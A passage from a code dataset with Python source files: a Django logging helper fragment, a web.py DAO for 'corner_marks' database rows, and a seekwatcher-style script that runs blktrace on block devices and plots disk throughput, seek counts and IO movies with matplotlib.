format(file, linenumber)\n output += '- Source: {}\\n\\n'.format(line)\n return Error.objects.create(url=file, error=output, category=category, ip=ip, user=user)","repo_name":"pedrokasak/challenger_inatel","sub_path":"logs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11334750584","text":"#!/usr/bin/env python\n# coding: utf8\nimport datetime\n\nfrom extends import db\n__author__ = 'ye shuo'\n\n\nclass AdminCornerDao(object):\n \"\"\"\n 角标DAO\n \"\"\"\n @staticmethod\n def __gen_wheres_values(**kwargs):\n \"\"\"\n 生成查询条件及值\n :param kwargs:\n :rtype tuple:\n :return:\n \"\"\"\n wheres = []\n values = dict()\n group_name = kwargs.get(\"group_name\", \"\")\n\n if group_name:\n wheres.append(u\"group_name like $group_name\")\n values[\"group_name\"] = u\"%{}%\".format(group_name)\n\n where_str = u\" and \".join(wheres) if wheres else None\n\n return where_str, values\n\n @staticmethod\n def query_list(whats=None, group_name=None, limit=None, offset=None):\n \"\"\"\n 分页查询信息\n :param whats: 返回的字段\n :param group_name:\n :param limit:\n :param offset:\n :return:\n \"\"\"\n where_str, values = AdminCornerDao.__gen_wheres_values(group_name=group_name)\n\n if not whats:\n whats = u\"id, group_name, created_time, image, updated_time\"\n results = db.slave.select(\n tables=u\"corner_marks\",\n what=whats,\n vars=values,\n where=where_str,\n limit=limit,\n offset=offset,\n order=u\"updated_time DESC\"\n )\n\n return results\n\n @staticmethod\n def get_total_count(group_name=None):\n \"\"\"\n 获取对应的条数\n :param group_name:\n :return:\n \"\"\"\n where_str, values = AdminCornerDao.__gen_wheres_values(group_name=group_name)\n\n counts = db.slave.select(\n tables=u'corner_marks',\n what=u\"count(id) as counts\",\n vars=values,\n where=where_str\n ).first().counts\n\n return counts\n\n @staticmethod\n def save(group_name, *images):\n created_time = datetime.datetime.now()\n insert_values = [{\"group_name\": group_name, \"created_time\": created_time, \"image\": img}\n for img in images]\n\n _ids = db.master.multiple_insert(tablename=\"corner_marks\", values=insert_values)\n\n return _ids\n\n @staticmethod\n def delete(_ids):\n \"\"\"\n 删除\n :param _ids:\n :return:\n \"\"\"\n result = db.master.delete('corner_marks', vars={'ids': _ids}, where=u\"id in $ids\")\n\n return result\n\n @staticmethod\n def query_group_name_list():\n \"\"\"\n 所有的角标分组名\n :return:\n \"\"\"\n\n results = db.slave.select(tables=u\"corner_marks\", what=u\"group_name\", group=u\"group_name\")\n\n return results\n\ncornermark = AdminCornerDao\n\n","repo_name":"caowenbin/dabai-cms-server","sub_path":"dao/cornerdao.py","file_name":"cornerdao.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"11008615059","text":"import sys, os, signal, time, subprocess, tempfile, signal\nfrom optparse import OptionParser\n\nblktrace_only = False\n\ntry:\n from matplotlib import rcParams\n from matplotlib.font_manager import fontManager, FontProperties\n import numpy\nexcept:\n sys.stderr.write(\"matplotlib not found, using blktrace only mode\\n\")\n blktrace_only = True\n\nclass AnnoteFinder:\n \"\"\"\n callback for matplotlib to display an annotation when points are clicked on. 
The\n point which is closest to the click and within xtol and ytol is identified.\n \n Register this function like this:\n \n scatter(xdata, ydata)\n af = AnnoteFinder(xdata, ydata, annotes)\n connect('button_press_event', af)\n \"\"\"\n\n def __init__(self, axis=None):\n if axis is None:\n self.axis = gca()\n else:\n self.axis= axis\n self.drawnAnnotations = {}\n self.links = []\n \n def clear(self):\n for k in self.drawnAnnotations.keys():\n self.drawnAnnotations[k].set_visible(False)\n\n def __call__(self, event):\n if event.inaxes:\n if event.button != 1:\n self.clear()\n draw()\n return\n clickX = event.xdata\n clickY = event.ydata\n if (self.axis is None) or (self.axis==event.inaxes):\n self.drawAnnote(event.inaxes, clickX, clickY)\n \n def drawAnnote(self, axis, x, y):\n \"\"\"\n Draw the annotation on the plot\n \"\"\"\n if self.drawnAnnotations.has_key((x,y)):\n markers = self.drawnAnnotations[(x,y)]\n markers.set_visible(not markers.get_visible())\n draw()\n else:\n t = axis.text(x,y, \"(%3.2f, %3.2f)\"%(x,y), bbox=dict(facecolor='red',\n alpha=0.8))\n self.drawnAnnotations[(x,y)] = t\n draw()\n\ndef dev2num(dev):\n s2 = dev.replace(',', '.')\n return float(s2)\n\ndef flag2num(flag):\n if flag == 'Q':\n return 0.0\n if flag == 'C':\n return 1.0\n if flag == 'U':\n return 2.0\n return 3.0\n sys.stderr.write(\"unknown flag %s\\n\" %flag)\n\ndef command2num(com):\n if com[0] == 'R':\n return 0.0\n if com[0] == 'W':\n return 1.0\n return 2.0\n sys.stderr.write(\"unknown command %s\\n\" % com)\n\ndef loaddata(fh,delimiter=None, converters=None):\n\n def iter(fh, delimiter, converters):\n global devices_sector_max\n\n if converters is None: converters = {}\n last_sector = None\n last_rw = None\n last_row = None\n last_end = None\n last_cmd = None\n last_size = None\n last_dev = None\n for i,line in enumerate(fh):\n if not line.startswith('C'):\n continue\n row = [converters.get(i,float)(val) for i,val in enumerate(line.split(delimiter))]\n this_time = row[7]\n this_dev = row[8]\n this_sector = row[4]\n this_rw = row[1]\n this_size = row[5] / 512\n\n devices_sector_max[this_dev] = max(this_sector + this_size,\n devices_sector_max.get(this_dev, 0));\n\n if (last_row and this_rw == last_rw and\n this_dev == last_dev and\n this_time - last_time < .5 and last_size < 512 and\n this_sector == last_end):\n last_end += this_size\n last_size += this_size\n last_row[5] += row[5]\n continue\n \n if last_row:\n for x in last_row:\n yield x\n \n last_row = row\n last_sector = this_sector\n last_time = this_time\n last_rw = this_rw\n last_end = this_sector + this_size\n last_size = this_size\n last_dev = this_dev\n if last_row:\n for x in last_row:\n yield x\n\n X = numpy.fromiter(iter(fh, delimiter, converters), dtype=float)\n return X\n\ndef sort_by_time(data):\n def sort_iter(sorted):\n for x in sorted:\n for field in data[x]:\n yield field\n\n times = data[:,7]\n sorted = times.argsort()\n X = numpy.fromiter(sort_iter(sorted), dtype=float)\n shapeit(X)\n return X\n\ndef data_movie(data):\n def xycalc(sector):\n if sector < yzoommin or sector > yzoommax:\n return None\n sector = sector - yzoommin\n sector = sector / sectors_per_cell\n yval = floor(sector / num_cells)\n xval = sector % num_cells\n return (xval, yval)\n\n def add_frame(prev, ins, max):\n if len(prev) > max:\n del prev[0]\n prev.append(ins)\n\n def graphit(a, prev):\n def plotone(a, x, y, color):\n a.plot(x, y, 's', color=color, mfc=color,\n mec=color, markersize=options.movie_cell_size)\n a.hold(True)\n alpha = 0.1\n 
a.hold(False)\n\n for x in range(len(prev)):\n readx, ready, writex, writey = prev[x]\n if x == len(prev) - 1:\n alpha = 1.0\n\n if readx:\n color = bluemap(alpha)\n plotone(a, readx, ready, color)\n if writex:\n color = greenmap(alpha)\n plotone(a, writex, writey, color)\n alpha += 0.1\n \n options.movie_cell_size = float(options.movie_cell_size)\n num_cells = 600 / options.movie_cell_size\n\n total_cells = num_cells * num_cells\n sector_range = yzoommax - yzoommin\n sectors_per_cell = sector_range / total_cells\n total_secs = xmax - xmin\n movie_length = int(options.movie_length)\n movie_fps = int(options.movie_frames)\n total_frames = movie_length * movie_fps\n secs_per_frame = total_secs / total_frames\n print(f\"total frames is {total_frames} secs per frame = {secs_per_frame}\")\n start_second = xmin\n\n times = data[:,7]\n figindex = 0\n\n png_dir = tempfile.mkdtemp(dir=os.path.dirname(options.output))\n movie_name = options.output\n fname, fname_ext = os.path.splitext(options.output)\n fname = os.path.join(png_dir, fname);\n\n i = 0\n prev = []\n f = figure(figsize=(8,6))\n a = axes([ 0.10, 0.29, .85, .68 ])\n tput_ax = axes([ 0.10, 0.19, .85, .09 ])\n seek_ax = axes([ 0.10, 0.07, .85, .09 ])\n\n plot_seek_count(seek_ax, None, data, '-', None)\n ticks = seek_ax.get_yticks()\n ticks = list(arange(0, ticks[-1] + ticks[-1]/3, ticks[-1]/3))\n seek_ax.set_yticks(ticks)\n seek_ax.set_yticklabels( [ str(int(x)) for x in ticks ], fontsize='x-small')\n seek_ax.set_ylabel('Seeks / sec', fontsize='x-small')\n seek_ax.set_xlabel('Time (seconds)', fontsize='x-small')\n seek_ax.grid(True)\n\n plot_throughput(tput_ax, None, data, '-', None)\n\n # cut down the number of yticks to something more reasonable\n ticks = tput_ax.get_yticks()\n ticks = list(arange(0, ticks[-1] + ticks[-1]/3, ticks[-1]/3))\n tput_ax.set_yticks(ticks)\n tput_ax.set_xticks([])\n tput_ax.grid(True)\n\n if ticks[-1] < 3:\n tput_ax.set_yticklabels( [ \"%.1f\" % x for x in ticks ],\n fontsize='x-small')\n else:\n tput_ax.set_yticklabels( [ \"%d\" % x for x in ticks ],\n fontsize='x-small')\n\n tput_ax.set_ylabel('MB/s', fontsize='x-small')\n\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xlim(0, num_cells)\n a.set_ylim(0, num_cells)\n a.hold(False)\n datai = 0\n datalen = len(data)\n bluemap = get_cmap(\"Blues\")\n greenmap = get_cmap(\"Greens\")\n\n while i < total_frames and datai < datalen:\n start = start_second + i * secs_per_frame\n i += 1\n end = start + secs_per_frame\n if datai >= datalen or data[datai][7] > xmax:\n break\n write_xvals = []\n write_yvals = []\n read_xvals = []\n read_yvals = []\n while datai < datalen and data[datai][7] < end:\n row = data[datai]\n time = row[7]\n if time < start:\n print(f\"dropping time {time} < start {start}\")\n continue\n datai += 1\n sector = row[4]\n size = int(max(row[5] / 512, 1))\n rbs = row[1]\n cell = 0\n while cell < size:\n xy = xycalc(sector)\n sector += sectors_per_cell\n cell += sectors_per_cell\n if xy:\n if rbs:\n write_xvals.append(xy[0])\n write_yvals.append(xy[1])\n else:\n read_xvals.append(xy[0])\n read_yvals.append(xy[1])\n if not read_xvals and not write_xvals:\n continue\n\n add_frame(prev, (read_xvals, read_yvals, write_xvals, write_yvals), 10)\n graphit(a, prev)\n\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xlim(0, num_cells)\n a.set_ylim(0, num_cells)\n line = seek_ax.axvline(x=end, color='k')\n line2 = tput_ax.axvline(x=end, color='k')\n tput_ax.set_xlim(xmin, xmax)\n seek_ax.set_xlim(xmin, xmax)\n print(f\"start {start} secs end {end} 
secs frame {figindex}\")\n f.savefig(\"%s-%.6d.%s\" % (fname, figindex, \"png\"), dpi=options.dpi)\n line.set_linestyle('None')\n line2.set_linestyle('None')\n figindex += 1\n a.hold(True)\n\n if mencoder_found == \"png2theora\" and movie_name.endswith('.ogg'):\n os.system(\"png2theora -o %s %s\" % (movie_name, fname) + '-%06d.png')\n else:\n os.system(\"mencoder mf://%s*.png -mf type=png:fps=%d -of mpeg -ovc lavc -lavcopts vcodec=mpeg2video:vbitrate=%s -oac copy -o %s\" % (fname, movie_fps, options.movie_vbitrate, movie_name))\n\n for root, dirs, files in os.walk(png_dir):\n for name in files:\n os.remove(os.path.join(root, name))\n os.rmdir(png_dir)\n\ndef plot_data(ax, rw, data, style, label, alpha=1):\n def reduce_plot():\n reduce = {}\n skipped = 0\n for i in range(len(times)):\n x = floor(times[i] / x_per_cell)\n y = floor(sectors[i] / y_per_cell)\n if x in reduce and y in reduce[x]:\n skipped += 1\n continue\n y += 1\n h = reduce.setdefault(x, {})\n h[y] = 1\n yield x * x_per_cell\n yield y * y_per_cell\n xcells = 325.0 * options.io_graph_cell_multi\n x_per_cell = (xmax - xmin) / xcells\n ycells = 80.0 * options.io_graph_cell_multi\n y_per_cell = (yzoommax - yzoommin) / ycells\n\n if rw is None:\n if options.reads_only:\n rw = 0\n if options.writes_only:\n rw = 1\n if rw != None:\n if options.reads_only and rw != 0:\n return\n if options.writes_only and rw != 1:\n return\n rbs = data[:,1]\n data = data[numpy.where(rbs == rw)]\n times = data[:,7]\n sectors = data[:,4]\n if len(times) > 0:\n t = numpy.fromiter(reduce_plot(), dtype=float)\n t.shape = (len(t)//2, 2)\n xdata = t[:,0]\n ydata = t[:,1]\n lines = ax.plot(t[:,0], t[:,1], options.io_graph_dots, mew=0,\n ms=options.io_graph_marker_size,\n label=label, alpha=alpha)\n return lines\n return []\n\ndef add_roll(roll, max, num):\n if len(roll) == max:\n del roll[0]\n roll.append(num)\n total = 0.0\n for x in roll:\n total += x\n return total / len(roll)\n\ndef plot_throughput(ax, rw, data, style, label, alpha=1):\n def tput_iter(sizes,times):\n bytes = 0.0\n sec = None\n roll = []\n for x in range(len(sizes)):\n size = sizes[x]\n cur_time = floor(times[x])\n if sec == None:\n avg = add_roll(roll, options.rolling_avg, 0.0)\n yield (0.0, avg)\n sec = cur_time\n continue\n if sec != cur_time:\n avg = add_roll(roll, options.rolling_avg, bytes)\n yield (sec, avg / (1024 * 1024))\n bytes = 0\n sec = cur_time\n bytes += size\n scale = times[-1] - sec\n if scale > 0 and scale < 1:\n bytes += sizes[-1]\n bytes = bytes / scale\n avg = add_roll(roll, options.rolling_avg, bytes)\n yield(ceil(times[-1]), avg / (1024 * 1024))\n\n if rw is None:\n if options.reads_only:\n rw = 0\n if options.writes_only:\n rw = 1\n if rw != None:\n if options.reads_only and rw != 0:\n return\n if options.writes_only and rw != 1:\n return\n rbs = data[:,1]\n data = data[numpy.where(rbs == rw)]\n\n if len(data) == 0:\n return\n\n times = numpy.array([])\n tput = numpy.array([])\n for x,y in tput_iter(data[:,5], data[:,7]):\n times = numpy.append(times, x)\n tput = numpy.append(tput, y)\n\n return ax.plot(times, tput, style, label=label, alpha=alpha)\n\ndef plot_seek_count(ax, rw, data, style, label, alpha=1):\n def iter(sectors, times):\n count = 0.0\n last_dev = {}\n # last holds an array (sector, size)\n\n last = None\n last_size = None\n sec = None\n\n roll = []\n for x in range(len(sectors)):\n sector = sectors[x]\n io_size = data[x][5] / 512\n dev = data[x][8]\n last, last_size = last_dev.get(dev, (None, None))\n cur_time = floor(times[x])\n if sec == None:\n 
avg = add_roll(roll, options.rolling_avg, 0.0)\n                yield (0.0, avg)\n                sec = cur_time\n                continue\n            if sec != cur_time:\n                avg = add_roll(roll, options.rolling_avg, count)\n                yield (sec, avg)\n                count = 0\n                sec = cur_time\n            if last != None:\n                diff = abs((last + last_size) - sector)\n                if diff > 128:\n                    count += 1\n            last_dev[dev] = (sector, io_size)\n\n        scale = times[-1] - sec\n        if scale > 0 and scale < 1:\n            dev = data[-1][8]\n            last, last_size = last_dev[dev]\n            sector = sectors[-1]\n            diff = abs((last + last_size) - sector)\n            if diff > 128:\n                count += 1\n            count = count / scale\n        avg = add_roll(roll, options.rolling_avg, count)\n        yield(ceil(times[-1]), avg)\n\n    if rw is None:\n        if options.reads_only:\n            rw = 0\n        if options.writes_only:\n            rw = 1\n\n    if rw != None:\n        if options.reads_only and rw != 0:\n            return\n        if options.writes_only and rw != 1:\n            return\n        rbs = data[:,1]\n        data = data[numpy.where(rbs == rw)]\n\n    if len(data) == 0:\n        return\n\n    times = numpy.array([])\n    counts = numpy.array([])\n    for x,y in iter(data[:,4], data[:,7]):\n        times = numpy.append(times, x)\n        counts = numpy.append(counts, y)\n\n    return ax.plot(times, counts, style, label=label, alpha=alpha)\n\ndef run_one_blktrace(trace, device):\n    args = [ \"blktrace\", \"-d\", device, \"-o\", trace, \"-b\", \"2048\" ]\n    if not options.full_trace:\n        args += [ \"-a\", \"complete\" ]\n    print(\" \".join(args))\n    return os.spawnlp(os.P_NOWAIT, *args)\n\ndef run_blktrace(trace, devices):\n    pids = []\n    for x in devices:\n        tmp = x.replace('/', '.')\n        if len(devices) > 1:\n            this_trace = trace + \".\" + tmp\n        else:\n            this_trace = trace\n        pids.append(run_one_blktrace(this_trace, x))\n    return pids\n\nblktrace_pids = []\ndef run_prog(program, trace, devices):\n    global blktrace_pids\n    def killblktracers(signum, frame):\n        global blktrace_pids\n        cpy = blktrace_pids\n        blktrace_pids = []\n        for x in cpy:\n            os.kill(x, signal.SIGTERM)\n            pid, err = os.wait()\n        if err:\n            sys.stderr.write(\"exit due to blktrace failure %d\\n\" % err)\n            sys.exit(1)\n\n    blktrace_pids = run_blktrace(trace, devices)\n\n    # force some IO, blktrace does timestamps from the first IO\n    if len(devices) > 1:\n        for x in devices:\n            try:\n                os.system(\"dd if=%s of=/dev/zero bs=16k count=1 iflag=direct > /dev/null 2>&1\" % x)\n            except:\n                print(f\"O_DIRECT read from {x} failed trying buffered\")\n                b = open(x, 'rb').read(1024 * 1024)\n\n    signal.signal(signal.SIGTERM, killblktracers)\n    signal.signal(signal.SIGINT, killblktracers)\n    sys.stderr.write(\"running :%s:\\n\" % program)\n    os.system(program)\n    sys.stderr.write(\"done running %s\\n\" % program)\n    killblktracers(None, None)\n    sys.stderr.write(\"blktrace done\\n\")\n\n    signal.signal(signal.SIGTERM, signal.SIG_DFL)\n    signal.signal(signal.SIGINT, signal.SIG_DFL)\n\ndef run_blkparse(trace, converters):\n    tracefiles = []\n    data = numpy.array([])\n    seen = {}\n    print(f\"run_blkparse on {trace}\")\n    if not os.path.exists(trace + \"blktrace.0\"):\n        dirname = os.path.dirname(trace) or \".\"\n        files = os.listdir(dirname)\n        joinname = os.path.dirname(trace) or \"\"\n        for x in files:\n            x = os.path.join(joinname, x)\n            if x.startswith(trace) and \".blktrace.\" in x:\n                i = x.rindex('.blktrace.')\n                cur = x[0:i]\n                if cur not in seen:\n                    tracefiles.append(x[0:i])\n                    seen[cur] = 1\n    else:\n        tracefiles.append(trace)\n\n    for x in tracefiles:\n        print(f\"using tracefile {x}\")\n        p = os.popen('blkparse -q -i ' + x +\n                     ' -f \"%a %d %M %m %S %N %s %5T.%9t %D\\n\"')\n        cur = loaddata(p, converters=converters)\n        data = numpy.append(data, cur)\n    return data\n\ndef shapeit(X):\n 
lines = len(X) // 9\n X.shape = (lines, 9)\n\ndef unshapeit(X):\n lines = len(X) * 9\n X.shape = (lines, 1)\n\ndef getlabel(i):\n if i < len(options.label):\n return options.label[i]\n return \"\"\n\ndef line_picker(line, mouseevent):\n if mouseevent.xdata is None: return False, dict()\n print(f\"{mouseevent.xdata} {mouseevent.ydata}\")\n return False, dict()\n\ndef running_config():\n\t\"\"\"\n\tReturn path of config file of the currently running kernel\n\t\"\"\"\n\tversion = subprocess.getoutput('uname -r')\n\tfor config in ('/proc/config.gz', \\\n '/boot/config-%s' % version,\n '/lib/modules/%s/build/.config' % version):\n\t\tif os.path.isfile(config):\n\t\t\treturn config\n\treturn None\n\n\ndef check_for_kernel_feature(feature):\n\tconfig = running_config()\n\n\tif not config:\n\t\tsys.stderr.write(\"Can't find kernel config file\")\n\n\tif config.endswith('.gz'):\n\t\tgrep = 'zgrep'\n\telse:\n\t\tgrep = 'grep'\n\tgrep += ' ^CONFIG_%s= %s' % (feature, config)\n\n\tif not subprocess.getoutput(grep):\n\t\tsys.stderr.write(\"Kernel doesn't have a %s feature\\n\" % (feature))\n\t\tsys.exit(1)\n\ndef check_for_debugfs():\n tmp = subprocess.getoutput('mount | grep /sys/kernel/debug')\n tmp = len(tmp)\n if tmp == 0:\n sys.stderr.write(\"debugfs not mounted (/sys/kernel/debug)\\n\")\n sys.exit(1)\n\ndef check_for_mencoder():\n dirs = os.getenv('PATH', os.path.defpath).split(os.path.pathsep)\n for dir in dirs:\n fname = os.path.join(dir, 'png2theora')\n if os.path.isfile(fname):\n return \"png2theora\"\n for dir in dirs:\n fname = os.path.join(dir, 'mencoder')\n if os.path.isfile(fname):\n return \"mencoder\"\n return None\n\ndef translate_sector(dev, sector):\n return device_translate[dev] + sector;\n\nusage = \"usage: %prog [options]\"\nparser = OptionParser(usage=usage)\nparser.add_option(\"-d\", \"--device\", help=\"Device for blktrace\", default=[],\n action=\"append\")\nparser.add_option(\"-t\", \"--trace\", help=\"blktrace file\", default=[],\n action=\"append\")\nparser.add_option(\"-p\", \"--prog\", help=\"exec program\", default=\"\")\nparser.add_option(\"\", \"--full-trace\", help=\"Don't filter blktrace events\",\n default=False, action=\"store_true\")\n\nif not blktrace_only:\n parser.add_option(\"-z\", \"--zoom\", help=\"Zoom range min:max (in MB)\",\n default=\"\")\n parser.add_option(\"-x\", \"--xzoom\", help=\"Time range min:max (seconds)\",\n default=\"\")\n parser.add_option(\"-o\", \"--output\", help=\"output file\", default=\"trace.png\")\n parser.add_option(\"-l\", \"--label\", help=\"label\", default=[],\n action=\"append\")\n parser.add_option(\"\", \"--dpi\", help=\"dpi\", default=120)\n parser.add_option(\"\", \"--io-graph-dots\", help=\"Disk IO dot style\",\n default='s')\n parser.add_option(\"\", \"--io-graph-marker-size\", help=\"Disk IO dot size\",\n default=1.5, type=\"float\")\n parser.add_option(\"\", \"--io-graph-cell-multi\", help=\"Multiplier for cells\",\n default=2, type=\"float\")\n parser.add_option(\"-I\", \"--no-io-graph\", help=\"Don't create an IO graph\",\n default=False, action=\"store_true\")\n parser.add_option(\"-r\", \"--rolling-avg\",\n help=\"Rolling average for seeks and throughput (in seconds)\",\n default=None)\n\n parser.add_option(\"-i\", \"--interactive\", help=\"Use matplotlib interactive\",\n action=\"store_true\", default=False)\n parser.add_option(\"\", \"--backend\",\n help=\"matplotlib backend (QtAgg, TkAgg, GTKAgg) case sensitive\",\n default=\"QtAgg\")\n parser.add_option(\"-T\", \"--title\", help=\"Graph Title\", 
default=\"\")\n parser.add_option(\"-R\", \"--reads-only\", help=\"Graph only reads\",\n default=False, action=\"store_true\")\n parser.add_option(\"-W\", \"--writes-only\", help=\"Graph only writes\",\n default=False, action=\"store_true\")\n\n mencoder_found = check_for_mencoder()\n if mencoder_found:\n parser.add_option(\"-m\", \"--movie\", help=\"Generate an IO movie\",\n default=False, action=\"store_true\")\n parser.add_option(\"\", \"--movie-frames\",\n help=\"Number of frames per second\",\n default=10)\n parser.add_option(\"\", \"--movie-length\", help=\"Movie length in seconds\",\n default=30)\n parser.add_option(\"\", \"--movie-cell-size\",\n help=\"Size in pixels of the IO cells\", default=2)\n parser.add_option(\"\", \"--movie-vbitrate\",\n help=\"Mencoder vbitrate option (default 16000)\",\n default=\"16000\")\n\n(options,args) = parser.parse_args()\n\nif not blktrace_only:\n # rcParams['numerix'] = 'numpy'\n if options.interactive:\n rcParams['backend'] = options.backend\n rcParams['interactive'] = 'True'\n else:\n rcParams['backend'] = 'Agg'\n rcParams['interactive'] = 'False'\n from pylab import *\n\nif not options.trace:\n parser.print_help()\n sys.exit(1)\n\nconverters = {}\nconverters[0] = flag2num\nconverters[1] = command2num\nconverters[8] = dev2num\n\nif options.prog:\n check_for_kernel_feature(\"DEBUG_FS\")\n check_for_kernel_feature(\"BLK_DEV_IO_TRACE\")\n check_for_debugfs()\n\n if not options.trace or not options.device:\n sys.stderr.write(\"blktrace output file or device not specified\\n\")\n sys.exit(1)\n run_prog(options.prog, options.trace[0], options.device)\n if blktrace_only:\n sys.exit(0)\n\n if not options.title:\n options.title = options.prog\n\ndata = numpy.array([])\nruns = []\nmust_sort = True\n\nfor x in options.trace:\n devices_sector_max = {}\n run = run_blkparse(x, converters)\n\n device_translate = {}\n total = 0\n if len(devices_sector_max) > 1:\n must_sort = True\n for x in devices_sector_max:\n device_translate[x] = total + devices_sector_max[x]\n total += devices_sector_max[x]\n shapeit(run)\n if len(devices_sector_max) > 1:\n for x in run:\n sector = x[4]\n dev = x[8]\n x[4] = device_translate[dev] + sector\n \n sorted = sort_by_time(run)\n run = sorted\n\n unshapeit(run)\n runs.append(run)\n data = numpy.append(data, run)\n\nshapeit(data)\nfor x in runs:\n shapeit(x)\n if len(x) == 0:\n sys.stderr.write(\"Empty blktrace run found, exiting\\n\")\n sys.exit(1)\n\nif must_sort:\n sorted = sort_by_time(data)\n data = sorted\n\n# try to drop out the least common data points by creating\n# a historgram of the sectors seen.\nsectors = data[:,4]\nsizes = data[:,5]\nymean = numpy.mean(sectors)\nsectormax = numpy.max(sectors)\nsectormin = numpy.min(sectors)\n\nif not options.zoom or ':' not in options.zoom:\n def add_range(hist, step, sectormin, start, size):\n while size > 0:\n slot = int((start - sectormin) / step)\n slot_start = step * slot + sectormin\n if slot >= len(hist) or slot < 0:\n sys.stderr.write(\"illegal slot %d start %d step %d\\n\" %\n (slot, start, step))\n return\n else:\n val = hist[slot]\n this_size = min(size, start - slot_start)\n this_count = max(this_size / 512, 1)\n hist[slot] = val + this_count\n size -= this_size\n start += this_count\n \n hist = [0] * 11\n step = (sectormax - sectormin) / 10\n for row in data:\n start = row[4]\n size = row[5] / 512\n add_range(hist, step, sectormin, start, size)\n\n m = max(hist)\n\n for x in range(len(hist)):\n if m == hist[x]:\n maxi = x\n # hist[maxi] is the most common bucket. 
walk toward it from the\n # min and max values looking for the first buckets that have some\n # significant portion of the data\n #\n yzoommin = maxi * step + sectormin\n for x in range(0, maxi):\n if hist[x] > hist[maxi] * .05:\n yzoommin = x * step + sectormin\n break\n\n yzoommax = (maxi + 1) * step + sectormin\n for x in range(len(hist) - 1, maxi, -1):\n if hist[x] > hist[maxi] * .05:\n yzoommax = (x + 1) * step + sectormin\n break\nelse:\n words = options.zoom.split(':')\n yzoommin = max(0, float(words[0]) * 2048)\n if float(words[1]) == 0:\n yzoommax = sectormax\n else:\n yzoommax = min(sectormax, float(words[1]) * 2048)\n\nsizes = 0\nflags = [ x[:,0] for x in runs ]\ntimes = data[:,7]\nxmin = numpy.min(times)\nxmax = numpy.max(times)\n\nif options.rolling_avg == None:\n options.rolling_avg = max(1, int((xmax - xmin) / 25))\nelse:\n options.rolling_avg = max(1, int(options.rolling_avg))\n\nif options.xzoom:\n words = [ float(x) for x in options.xzoom.split(':') ]\n if words[0] != 0:\n xmin = words[0]\n if words[1] != 0:\n xmax = words[1]\n\nsectors = 0\nflags = 0\ncompleted = 0\ntimes = 0\n\nif options.no_io_graph:\n total_graphs = 2\nelse:\n total_graphs = 3\n\nif mencoder_found and options.movie:\n data_movie(runs[0])\n sys.exit(1)\n\nf = figure(figsize=(8,6))\n\nif options.title:\n options.title += \"\\n\\n\"\n\n# Throughput goes at the botoom\na = subplot(total_graphs, 1, total_graphs)\nfor i in range(len(runs)):\n label = getlabel(i)\n plot_throughput(a, None, runs[i], '-', label)\n\n# make sure the final second goes on the x axes\nticks = list(arange(xmin, xmax, xmax/8))\nticks.append(xmax)\nxticks = ticks\na.set_xticks(ticks)\na.set_yticklabels( [ \"%d\" % x for x in ticks ])\nif ticks[-1] < 4:\n xticklabels = [ \"%.1f\" % x for x in ticks ]\nelse:\n xticklabels = [ \"%d\" % x for x in ticks ]\na.set_xticklabels(xticklabels)\n\n# cut down the number of yticks to something more reasonable\nticks = a.get_yticks()\nticks = list(arange(0, ticks[-1] + ticks[-1]/4, ticks[-1]/4))\na.set_yticks(ticks)\n\nif ticks[-1] < 4:\n a.set_yticklabels( [ \"%.1f\" % x for x in ticks ])\nelse:\n a.set_yticklabels( [ \"%d\" % x for x in ticks ])\n\na.set_title('Throughput')\na.set_ylabel('MB/s')\n\n# the bottom graph gets xticks, set it here\na.set_xlabel('Time (seconds)')\nif options.label:\n a.legend(loc=(1.01, 0.5), shadow=True, pad=0.5, numpoints=2,\n handletextsep = 0.005,\n labelsep = 0.01,\n prop=FontProperties(size='x-small') )\n\n# next is the seek count graph\na = subplot(total_graphs, 1, total_graphs - 1)\nfor i in range(len(runs)):\n label = getlabel(i)\n plot_seek_count(a, None, runs[i], '-', label)\n\n# cut down the number of yticks to something more reasonable\nticks = a.get_yticks()\nticks = list(arange(0, ticks[-1] + ticks[-1]/4, ticks[-1]/4))\na.set_yticks(ticks)\na.set_yticklabels( [ str(int(x)) for x in ticks ])\n\nif options.no_io_graph and options.title:\n a.set_title(options.title + 'Seek Count')\nelse:\n a.set_title('Seek Count')\n\na.set_ylabel('Seeks / sec')\nif options.label:\n a.legend(loc=(1.01, 0.5), shadow=True, pad=0.5, numpoints=2,\n handletextsep = 0.005,\n labelsep = 0.01,\n prop=FontProperties(size='x-small') )\n\n# and the optional IO graph\nif not options.no_io_graph:\n a = subplot(total_graphs, 1, total_graphs - 2)\n for i in range(len(runs)):\n label = getlabel(i)\n plot_data(a, 0, runs[i], options.io_graph_dots, label + \" Read\")\n plot_data(a, 1, runs[i], options.io_graph_dots, label + \" Write\")\n\n af = AnnoteFinder(axis=a)\n 
connect('button_press_event', af)\n    a.set_title(options.title + 'Disk IO')\n    a.set_ylabel('Disk offset (MB)')\n    flag = data[:,0]\n    sectors = data[:,4]\n    zoom = (sectors > yzoommin) & (sectors < yzoommax)\n    zoom = data[zoom]\n    sectors = zoom[:,4]\n    yzoommin = numpy.min(sectors)\n    yzoommax = numpy.max(sectors)\n    ticks = list(arange(yzoommin, yzoommax, (yzoommax - yzoommin) / 4))\n    ticks.append(yzoommax)\n    a.set_yticks(ticks)\n    a.set_yticklabels( [ str(int(x/2048)) for x in ticks ] )\n    a.legend(loc=(1.01, 0.5), shadow=True, numpoints=1,\n             markerscale = 1.1,\n             prop=FontProperties(size='x-small') )\n    a.set_ylim(yzoommin, yzoommax)\n\n# squeeze the graphs over to the left a bit to make room for the\n# legends\n#\nsubplots_adjust(right = 0.8, hspace=0.3)\n\n# finally, some global bits for each subplot\nfor x in range(1, total_graphs + 1):\n    a = subplot(total_graphs, 1, x)\n\n    # turn off the xtick labels on the graphs above the bottom\n    if not options.interactive and x < total_graphs:\n        a.set_xticklabels([])\n    elif options.interactive:\n        a.set_xticks(xticks)\n        a.set_xticklabels(xticklabels)\n\n    # create dashed lines for each ytick\n    ticks = a.get_yticks()\n    ymin, ymax = a.get_ylim()\n    for y in ticks[1:]:\n        try:\n            a.hlines(y, xmin, xmax, linestyle='dashed', alpha=0.5)\n        except:\n            a.hlines(y, xmin, xmax, alpha=0.5)\n    a.set_ylim(ymin, ymax)\n    # set the xlimits to something sane\n    a.set_xlim(xmin, xmax)\n\nif not options.interactive:\n    